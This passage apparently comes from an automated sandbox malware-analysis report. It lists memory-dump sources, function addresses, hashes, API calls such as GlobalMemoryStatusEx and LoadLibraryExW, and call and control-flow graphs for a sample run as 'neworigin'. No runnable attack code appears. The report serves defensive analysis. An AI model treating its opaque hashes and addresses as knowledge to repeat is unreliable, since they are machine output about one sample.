                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                • Opcode ID: 891f923397d8f86d33f5a117b0420deb6528402b7108c8e421098af4ced467dc
                                                                                                                • Instruction ID: 2aa596ea6af59908ffb4d6f255b0a5c66503d8d242d16512a1ecabaf7b2867fc
                                                                                                                • Opcode Fuzzy Hash: 891f923397d8f86d33f5a117b0420deb6528402b7108c8e421098af4ced467dc
                                                                                                                • Instruction Fuzzy Hash: BE318B72A0061AABDB15CF64CC86DAF7BA5EF45250F268138FC04DB250EB35DD94CBA4
                                                                                                                Function 1004218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,100415D8,00000000,00000000,?,10042132,100415D8,00000000,00000000,00000000,?,10042283,00000006,FlsSetValue), ref: 100421BD
                                                                                                                • GetLastError.KERNEL32(?,10042132,100415D8,00000000,00000000,00000000,?,10042283,00000006,FlsSetValue,10056FC4,FlsSetValue,00000000,00000364,?,1004192D), ref: 100421C9
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10042132,100415D8,00000000,00000000,00000000,?,10042283,00000006,FlsSetValue,10056FC4,FlsSetValue,00000000), ref: 100421D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3177248105-0
                                                                                                                • Opcode ID: f2aaaf464d45b9438b65fa78196a39e41bb90bd4464e6c8db5a168699c1e723e
                                                                                                                • Instruction ID: e7d6c1fecf6b8ff97ee078c3166930e67945fa4432b66ad818c8390abb0b6000
                                                                                                                • Opcode Fuzzy Hash: f2aaaf464d45b9438b65fa78196a39e41bb90bd4464e6c8db5a168699c1e723e
                                                                                                                • Instruction Fuzzy Hash: 77018472741233ABD7218A68DD84A467BD8EF56BA1B720630FF15E7160D760D90186F8
                                                                                                                Function 1003FAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 0-2276729525
                                                                                                                • Opcode ID: 6601b489c5fe1f2b58c75363fe267243a3ccaa18a185b085c328b57ccbb6e187
                                                                                                                • Instruction ID: eb34a3a4cd10a52977c289a391dc2c796010926ea19b3ab90a2e04662f1fe213
                                                                                                                • Opcode Fuzzy Hash: 6601b489c5fe1f2b58c75363fe267243a3ccaa18a185b085c328b57ccbb6e187
                                                                                                                • Instruction Fuzzy Hash: C6514A71B181469AD702EB14CA413FE77E4DB40782F308D3CF8D5CA2A9EB758CD59A4A

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:14.5%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:203
                                                                                                                Total number of Limit Nodes:27
                                                                                                                execution_graph 27964 2a00848 27966 2a0084e 27964->27966 27965 2a0091b 27966->27965 27969 2a0137f 27966->27969 27976 2a01487 27966->27976 27970 2a01383 27969->27970 27971 2a012d5 27969->27971 27970->27971 27975 2a01487 3 API calls 27970->27975 27984 2a07d80 27970->27984 27992 2a07d90 27970->27992 28000 2a07ea8 27970->28000 27971->27966 27975->27970 27977 2a01493 27976->27977 27981 2a01396 27976->27981 27977->27966 27978 2a01484 27978->27966 27979 2a07d80 3 API calls 27979->27981 27980 2a07d90 3 API calls 27980->27981 27981->27978 27981->27979 27981->27980 27982 2a07ea8 3 API calls 27981->27982 27983 2a01487 3 API calls 27981->27983 27982->27981 27983->27981 27985 2a07d89 27984->27985 27987 2a07e57 27985->27987 28008 2a08750 27985->28008 28014 2a08708 27985->28014 27986 2a07f12 27986->27970 27987->27986 28020 2a0f613 27987->28020 28025 2a0f7bf 27987->28025 27993 2a07da6 27992->27993 27995 2a07e57 27993->27995 27996 2a08750 3 API calls 27993->27996 27997 2a08708 3 API calls 27993->27997 27994 2a07f12 27994->27970 27995->27994 27998 2a0f613 3 API calls 27995->27998 27999 2a0f7bf 3 API calls 27995->27999 27996->27993 27997->27993 27998->27994 27999->27994 28001 2a07eb2 28000->28001 28002 2a07ecc 28001->28002 28004 687fb58 3 API calls 28001->28004 28005 687fb68 3 API calls 28001->28005 28003 2a07f12 28002->28003 28006 2a0f613 3 API calls 28002->28006 28007 2a0f7bf 3 API calls 28002->28007 28003->27970 28004->28002 28005->28002 28006->28003 28007->28003 28009 2a08769 28008->28009 28010 2a08f2d 28009->28010 28030 2a09fa8 28009->28030 28036 2a0a04b 28009->28036 28042 2a09f98 28009->28042 28010->27985 28015 2a0870d 28014->28015 28016 2a08f2d 28015->28016 28017 2a09fa8 3 API calls 28015->28017 28018 2a09f98 3 API calls 28015->28018 28019 2a0a04b 3 API calls 28015->28019 28016->27985 28017->28015 28018->28015 28019->28015 28021 2a0f639 28020->28021 28022 2a0f6af 28021->28022 28149 2a0f840 28021->28149 28155 2a0f850 28021->28155 28026 2a0f7ca 28025->28026 28190 687fb58 28026->28190 28197 687fb68 28026->28197 28027 2a0f7d1 28027->27986 28032 2a09fc5 28030->28032 28031 2a0a061 28032->28031 28048 2a0a0a8 28032->28048 28055 2a0a098 28032->28055 28062 2a0a1b3 28032->28062 28038 2a0a020 28036->28038 28037 2a0a061 28038->28037 28039 2a0a0a8 3 API calls 28038->28039 28040 2a0a1b3 3 API calls 28038->28040 28041 2a0a098 3 API calls 28038->28041 28039->28038 28040->28038 28041->28038 28044 2a09fa8 28042->28044 28043 2a0a061 28044->28043 28045 2a0a0a8 3 API calls 28044->28045 28046 2a0a1b3 3 API calls 28044->28046 28047 2a0a098 3 API calls 28044->28047 28045->28044 28046->28044 28047->28044 28050 2a0a0c2 28048->28050 28049 2a0a182 28050->28049 28052 2a0a1b3 3 API calls 28050->28052 28078 2a0a1c0 28050->28078 28088 2a0a2d8 28050->28088 28098 2a0a4d6 28050->28098 28052->28050 28057 2a0a0a8 28055->28057 28056 2a0a182 28057->28056 28058 2a0a1c0 3 API calls 28057->28058 28059 2a0a1b3 3 API calls 28057->28059 28060 2a0a4d6 3 API calls 28057->28060 28061 2a0a2d8 3 API calls 28057->28061 28058->28057 28059->28057 28060->28057 28061->28057 28064 2a0a143 28062->28064 28066 2a0a1ba 28062->28066 28063 2a0a182 28064->28063 28074 2a0a1c0 3 API calls 28064->28074 28075 2a0a1b3 3 API calls 28064->28075 28076 2a0a4d6 3 API calls 28064->28076 28077 2a0a2d8 3 API calls 28064->28077 28065 2a0a505 28065->28032 28066->28065 28067 2a0a1c0 3 API calls 28066->28067 28068 2a0a1b3 3 API calls 28066->28068 28069 2a0a4d6 3 API calls 28066->28069 28070 2a0a2d8 3 API calls 28066->28070 28071 2a0df00 3 API calls 28066->28071 28072 2a0de28 3 API calls 28066->28072 28073 2a0de38 3 API calls 28066->28073 28067->28066 28068->28066 28069->28066 28070->28066 28071->28066 28072->28066 28073->28066 28074->28064 28075->28064 28076->28064 28077->28064 28080 2a0a1c5 28078->28080 28079 2a0a505 28079->28050 28080->28079 28081 2a0a1c0 3 API calls 28080->28081 28082 2a0a1b3 3 API calls 28080->28082 28083 2a0a4d6 3 API calls 28080->28083 28084 2a0a2d8 3 API calls 28080->28084 28108 2a0de38 28080->28108 28114 2a0df00 28080->28114 28119 2a0de28 28080->28119 28081->28080 28082->28080 28083->28080 28084->28080 28090 2a0a1e1 28088->28090 28089 2a0a505 28089->28050 28090->28089 28091 2a0df00 3 API calls 28090->28091 28092 2a0de28 3 API calls 28090->28092 28093 2a0de38 3 API calls 28090->28093 28094 2a0a1c0 3 API calls 28090->28094 28095 2a0a1b3 3 API calls 28090->28095 28096 2a0a4d6 3 API calls 28090->28096 28097 2a0a2d8 3 API calls 28090->28097 28091->28090 28092->28090 28093->28090 28094->28090 28095->28090 28096->28090 28097->28090 28100 2a0a1e1 28098->28100 28099 2a0a505 28099->28050 28100->28099 28101 2a0a1c0 3 API calls 28100->28101 28102 2a0a1b3 3 API calls 28100->28102 28103 2a0a4d6 3 API calls 28100->28103 28104 2a0a2d8 3 API calls 28100->28104 28105 2a0df00 3 API calls 28100->28105 28106 2a0de28 3 API calls 28100->28106 28107 2a0de38 3 API calls 28100->28107 28101->28100 28102->28100 28103->28100 28104->28100 28105->28100 28106->28100 28107->28100 28109 2a0de47 28108->28109 28111 2a0dea7 28108->28111 28109->28080 28110 2a0df6b 28110->28080 28111->28110 28124 2a0eed0 28111->28124 28116 2a0df1a 28114->28116 28115 2a0df6b 28115->28080 28116->28115 28118 2a0eed0 3 API calls 28116->28118 28117 2a0e37e 28117->28080 28118->28117 28121 2a0dde8 28119->28121 28120 2a0de47 28120->28080 28121->28119 28121->28120 28123 2a0eed0 3 API calls 28121->28123 28122 2a0e37e 28122->28080 28123->28122 28125 2a0eee0 28124->28125 28129 2a0ef18 28125->28129 28137 2a0ef08 28125->28137 28126 2a0e37e 28126->28080 28130 2a0ef1d 28129->28130 28131 2a0ef25 28130->28131 28145 2a0e680 28130->28145 28131->28126 28133 2a0ef6e 28133->28126 28135 2a0f036 GlobalMemoryStatusEx 28136 2a0f066 28135->28136 28136->28126 28139 2a0ef18 28137->28139 28138 2a0ef25 28138->28126 28139->28138 28140 2a0e680 GlobalMemoryStatusEx 28139->28140 28141 2a0ef6a 28140->28141 28142 2a0ef6e 28141->28142 28143 2a0f036 GlobalMemoryStatusEx 28141->28143 28142->28126 28144 2a0f066 28143->28144 28144->28126 28146 2a0eff0 GlobalMemoryStatusEx 28145->28146 28148 2a0ef6a 28146->28148 28148->28133 28148->28135 28151 2a0f855 28149->28151 28150 2a0f883 28150->28021 28151->28150 28161 2a0f890 28151->28161 28168 2a0fa87 28151->28168 28175 2a0fb06 28151->28175 28157 2a0f855 28155->28157 28156 2a0f883 28156->28021 28157->28156 28158 2a0f890 3 API calls 28157->28158 28159 2a0fb06 3 API calls 28157->28159 28160 2a0fa87 3 API calls 28157->28160 28158->28157 28159->28157 28160->28157 28162 2a0f8b7 28161->28162 28163 2a0fb32 28162->28163 28164 2a0fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28162->28164 28167 2a0fb6b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28162->28167 28182 2a0fd19 28162->28182 28186 2a0ff9c 28162->28186 28164->28162 28167->28162 28170 2a0f916 28168->28170 28169 2a0fb32 28170->28169 28171 2a0fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28170->28171 28172 2a0fd19 3 API calls 28170->28172 28173 2a0fb6b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28170->28173 28174 2a0ff9c 3 API calls 28170->28174 28171->28170 28172->28170 28173->28170 28174->28170 28177 2a0f916 28175->28177 28176 2a0fb32 28177->28176 28178 2a0fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28177->28178 28179 2a0fd19 3 API calls 28177->28179 28180 2a0fb6b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28177->28180 28181 2a0ff9c 3 API calls 28177->28181 28178->28177 28179->28177 28180->28177 28181->28177 28185 2a0fd47 28182->28185 28183 2a0df00 3 API calls 28183->28185 28184 2a0fd8a 28184->28162 28185->28183 28185->28184 28189 2a0fd47 28186->28189 28187 2a0df00 3 API calls 28187->28189 28188 2a0fd8a 28188->28162 28189->28187 28189->28188 28191 687fb7d 28190->28191 28192 687fd92 28191->28192 28193 2a0df00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28191->28193 28194 2a0e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28191->28194 28195 2a0de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28191->28195 28196 2a0de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28191->28196 28192->28027 28193->28191 28194->28191 28195->28191 28196->28191 28199 687fb7d 28197->28199 28198 687fd92 28198->28027 28199->28198 28200 2a0de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28199->28200 28201 2a0df00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28199->28201 28202 2a0e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28199->28202 28203 2a0de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28199->28203 28200->28199 28201->28199 28202->28199 28203->28199

                                                                                                                Executed Functions

                                                                                                                Function 06872360 Relevance: 1.5, Instructions: 1530COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aa9d6f2a4f0afc2b68b04ca07a4b37ab6d6e95ab7b69519e2ec7225c730a1e5b
                                                                                                                • Instruction ID: 211ed67c91ace3250c696a6a8c135fe502f04ceac0bf054b17a63caa2f0d14f4
                                                                                                                • Opcode Fuzzy Hash: aa9d6f2a4f0afc2b68b04ca07a4b37ab6d6e95ab7b69519e2ec7225c730a1e5b
                                                                                                                • Instruction Fuzzy Hash: 4FE23730E00209CFDB64DF68C594A9DB7B2FF89310F5485AAD549EB261EB31EE85CB41
                                                                                                                Function 068766E8 Relevance: .8, Instructions: 821COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e48968a9621b7548e3e37d2ae8ce675dbfa058d6463cfa6462fe7e4ee7c97bf
                                                                                                                • Instruction ID: 4383054b58f2bf87c9bf6a20f987785603f91496110026f114aa6f2e5678c654
                                                                                                                • Opcode Fuzzy Hash: 0e48968a9621b7548e3e37d2ae8ce675dbfa058d6463cfa6462fe7e4ee7c97bf
                                                                                                                • Instruction Fuzzy Hash: D8629F34B006058FDB54DB68D594BADB7F2EF84314F248469E50AEB391EB31ED86CB90
                                                                                                                Function 0687B338 Relevance: .8, Instructions: 783COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f95dd2c1e46a271b8fcc4bd16f38c327a38809b15543e4a0e1878ef4f5086de8
                                                                                                                • Instruction ID: b3abb92a2b6028ae88e9e842a518b3533696ab1f77c234155590ffcfc4ab5021
                                                                                                                • Opcode Fuzzy Hash: f95dd2c1e46a271b8fcc4bd16f38c327a38809b15543e4a0e1878ef4f5086de8
                                                                                                                • Instruction Fuzzy Hash: CE525E30E012098FEF64DFA8D5907ADB7B2FB85310F24852AE615EB395DA34DD81CB91
                                                                                                                Function 0687C2A0 Relevance: .6, Instructions: 636COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eb47c1ba36df36485355e3a1318646ed600448a55a1c1f756d0dde26c1b32147
                                                                                                                • Instruction ID: 2ab8e31e1225ac95b09c1299cc61ce877c4194be34148f451e81dbbf7d93f3d1
                                                                                                                • Opcode Fuzzy Hash: eb47c1ba36df36485355e3a1318646ed600448a55a1c1f756d0dde26c1b32147
                                                                                                                • Instruction Fuzzy Hash: 47328E34B012098FDB54DF68D990BAEB7B2FB88314F108529E905EB795DB31ED42CB91
                                                                                                                Function 068756B8 Relevance: .6, Instructions: 591COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5134f3f5ae787207d946a826d998f4e77d3c8cf49cc1e9bd6c7665bb0859ef5c
                                                                                                                • Instruction ID: b30eee52c9f8efed8f4c15370b9c71ea192d25fad878c0c3304362adb5f03a15
                                                                                                                • Opcode Fuzzy Hash: 5134f3f5ae787207d946a826d998f4e77d3c8cf49cc1e9bd6c7665bb0859ef5c
                                                                                                                • Instruction Fuzzy Hash: 4812C131E102459FDB60DB64D8847AEBBB2EF85310F248829E95ADB385DF35DC41CB92
                                                                                                                Function 06877E78 Relevance: .5, Instructions: 476COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd6a22ce138ced30b7d18b877e283f7aadf34622fb982fd47e1e92e9ed1fcb4f
                                                                                                                • Instruction ID: f481d592f50da882b8b6ccda3d04acbdb52055a0cb66ad64f9a16b985feb48ff
                                                                                                                • Opcode Fuzzy Hash: fd6a22ce138ced30b7d18b877e283f7aadf34622fb982fd47e1e92e9ed1fcb4f
                                                                                                                • Instruction Fuzzy Hash: F1029E30B012068FDB54DF68D994AAEB7A2FF84314F248579E515DB395EB31EC82CB90
                                                                                                                Function 02A0EF18 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1115 2a0ef18-2a0ef23 1117 2a0ef25-2a0ef4c 1115->1117 1118 2a0ef4d-2a0ef6c call 2a0e680 1115->1118 1123 2a0ef72-2a0efb6 1118->1123 1124 2a0ef6e-2a0ef71 1118->1124 1129 2a0efb8-2a0efbb 1123->1129 1130 2a0efbd-2a0efbe 1123->1130 1132 2a0efc5-2a0efd1 1129->1132 1131 2a0efc0 1130->1131 1130->1132 1131->1132 1134 2a0efd3-2a0efd6 1132->1134 1135 2a0efd7-2a0efee 1132->1135 1137 2a0eff0-2a0eff4 1135->1137 1138 2a0eff5-2a0f064 GlobalMemoryStatusEx 1135->1138 1137->1138 1140 2a0f066-2a0f06c 1138->1140 1141 2a0f06d-2a0f095 1138->1141 1140->1141
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2393355171.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_2a00000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c96c31108e3ed323eaafa7ef145fb7cea3494f39b6d6a54c6399a0b569e37334
                                                                                                                • Instruction ID: e31f92dd3aff80f1b356d67cc83628e7944cc3147c3e97ad4ecc58fe7deaacb5
                                                                                                                • Opcode Fuzzy Hash: c96c31108e3ed323eaafa7ef145fb7cea3494f39b6d6a54c6399a0b569e37334
                                                                                                                • Instruction Fuzzy Hash: E2412431D043598FDB10DFAAD8447EEBBF5EF88310F14896AD504E7281DB749845CB90
                                                                                                                Function 02A0E680 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1144 2a0e680-2a0f064 GlobalMemoryStatusEx 1148 2a0f066-2a0f06c 1144->1148 1149 2a0f06d-2a0f095 1144->1149 1148->1149
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A0EF6A), ref: 02A0F057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2393355171.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_2a00000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 497e9e64d1dfa4f70c2689e510c0d72c4726022ae6b8c3d69bfed775ff3880ca
                                                                                                                • Instruction ID: a73ededeac94771901cf8e4661e3e8062ecb1531a558435b3af7a6693983c43c
                                                                                                                • Opcode Fuzzy Hash: 497e9e64d1dfa4f70c2689e510c0d72c4726022ae6b8c3d69bfed775ff3880ca
                                                                                                                • Instruction Fuzzy Hash: 331133B1C0465A9FDB10CF9AD984B9EFBF4AF48720F10816AD818B7241D778A950CFA5
                                                                                                                Function 02A0EFE8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1152 2a0efe8-2a0f02e 1154 2a0f036-2a0f064 GlobalMemoryStatusEx 1152->1154 1155 2a0f066-2a0f06c 1154->1155 1156 2a0f06d-2a0f095 1154->1156 1155->1156
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A0EF6A), ref: 02A0F057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2393355171.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_2a00000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 2f0a2d5ff81ade80c3192cb06c3821b1f0378fa0dc59c616a382f95387cab60b
                                                                                                                • Instruction ID: e669fc822fdaf3178a6ef6c91390de942e1536d4fc0a4f6cde7227b5f12466fe
                                                                                                                • Opcode Fuzzy Hash: 2f0a2d5ff81ade80c3192cb06c3821b1f0378fa0dc59c616a382f95387cab60b
                                                                                                                • Instruction Fuzzy Hash: B31136B1C0465A8FDB20CF9AD544BEEFBF4AF48320F14826AD418B7280D7789941CFA5
                                                                                                                Function 0687D060 Relevance: .8, Instructions: 800COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2132 687d060-687d07b 2133 687d07d-687d080 2132->2133 2134 687d082-687d0c4 2133->2134 2135 687d0c9-687d0cc 2133->2135 2134->2135 2136 687d115-687d118 2135->2136 2137 687d0ce-687d110 2135->2137 2138 687d13b-687d13e 2136->2138 2139 687d11a-687d136 2136->2139 2137->2136 2141 687d140-687d142 2138->2141 2142 687d14d-687d150 2138->2142 2139->2138 2145 687d549 2141->2145 2146 687d148 2141->2146 2147 687d152-687d161 2142->2147 2148 687d199-687d19c 2142->2148 2153 687d54c-687d558 2145->2153 2146->2142 2154 687d163-687d168 2147->2154 2155 687d170-687d17c 2147->2155 2150 687d19e-687d1a0 2148->2150 2151 687d1ab-687d1ae 2148->2151 2159 687d407-687d410 2150->2159 2160 687d1a6 2150->2160 2161 687d1f7-687d1fa 2151->2161 2162 687d1b0-687d1f2 2151->2162 2164 687d55e-687d84b 2153->2164 2165 687d1fc-687d20b 2153->2165 2154->2155 2156 687d182-687d194 2155->2156 2157 687da7d-687dab6 2155->2157 2156->2148 2182 687dab8-687dabb 2157->2182 2166 687d412-687d417 2159->2166 2167 687d41f-687d42b 2159->2167 2160->2151 2161->2165 2168 687d243-687d246 2161->2168 2162->2161 2344 687da72-687da7c 2164->2344 2345 687d851-687d857 2164->2345 2169 687d20d-687d212 2165->2169 2170 687d21a-687d226 2165->2170 2166->2167 2175 687d431-687d445 2167->2175 2176 687d53c-687d541 2167->2176 2179 687d28f-687d292 2168->2179 2180 687d248-687d28a 2168->2180 2169->2170 2170->2157 2177 687d22c-687d23e 2170->2177 2175->2145 2197 687d44b-687d45d 2175->2197 2176->2145 2177->2168 2183 687d294-687d2d6 2179->2183 2184 687d2db-687d2de 2179->2184 2180->2179 2191 687dade-687dae1 2182->2191 2192 687dabd-687dad9 2182->2192 2183->2184 2187 687d2e0-687d2e5 2184->2187 2188 687d2e8-687d2eb 2184->2188 2187->2188 2202 687d334-687d337 2188->2202 2203 687d2ed-687d32f 2188->2203 2199 687dae3 2191->2199 2200 687daf0-687daf3 2191->2200 2192->2191 2223 687d481-687d483 2197->2223 2224 687d45f-687d465 2197->2224 2391 687dae3 call 687dbd5 2199->2391 2392 687dae3 call 687dbe8 2199->2392 2204 687db26-687db28 2200->2204 2205 687daf5-687db21 2200->2205 2202->2153 2206 687d33d-687d340 2202->2206 2203->2202 2216 687db2f-687db32 2204->2216 2217 687db2a 2204->2217 2205->2204 2211 687d342-687d384 2206->2211 2212 687d389-687d38c 2206->2212 2211->2212 2225 687d3d5-687d3d8 2212->2225 2226 687d38e-687d3d0 2212->2226 2215 687dae9-687daeb 2215->2200 2216->2182 2220 687db34-687db43 2216->2220 2217->2216 2248 687db45-687dba8 call 6876698 2220->2248 2249 687dbaa-687dbbf 2220->2249 2229 687d48d-687d499 2223->2229 2230 687d467 2224->2230 2231 687d469-687d475 2224->2231 2234 687d3f5-687d3f7 2225->2234 2235 687d3da-687d3f0 2225->2235 2226->2225 2256 687d4a7 2229->2256 2257 687d49b-687d4a5 2229->2257 2239 687d477-687d47f 2230->2239 2231->2239 2236 687d3fe-687d401 2234->2236 2237 687d3f9 2234->2237 2235->2234 2236->2133 2236->2159 2237->2236 2239->2229 2248->2249 2260 687d4ac-687d4ae 2256->2260 2257->2260 2260->2145 2266 687d4b4-687d4d0 call 6876698 2260->2266 2282 687d4d2-687d4d7 2266->2282 2283 687d4df-687d4eb 2266->2283 2282->2283 2283->2176 2285 687d4ed-687d53a 2283->2285 2285->2145 2346 687d866-687d86f 2345->2346 2347 687d859-687d85e 2345->2347 2346->2157 2348 687d875-687d888 2346->2348 2347->2346 2350 687da62-687da6c 2348->2350 2351 687d88e-687d894 2348->2351 2350->2344 2350->2345 2352 687d896-687d89b 2351->2352 2353 687d8a3-687d8ac 2351->2353 2352->2353 2353->2157 2354 687d8b2-687d8d3 2353->2354 2357 687d8d5-687d8da 2354->2357 2358 687d8e2-687d8eb 2354->2358 2357->2358 2358->2157 2359 687d8f1-687d90e 2358->2359 2359->2350 2362 687d914-687d91a 2359->2362 2362->2157 2363 687d920-687d939 2362->2363 2365 687da55-687da5c 2363->2365 2366 687d93f-687d966 2363->2366 2365->2350 2365->2362 2366->2157 2369 687d96c-687d976 2366->2369 2369->2157 2370 687d97c-687d993 2369->2370 2372 687d995-687d9a0 2370->2372 2373 687d9a2-687d9bd 2370->2373 2372->2373 2373->2365 2378 687d9c3-687d9dc call 6876698 2373->2378 2382 687d9de-687d9e3 2378->2382 2383 687d9eb-687d9f4 2378->2383 2382->2383 2383->2157 2384 687d9fa-687da4e 2383->2384 2384->2365 2391->2215 2392->2215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
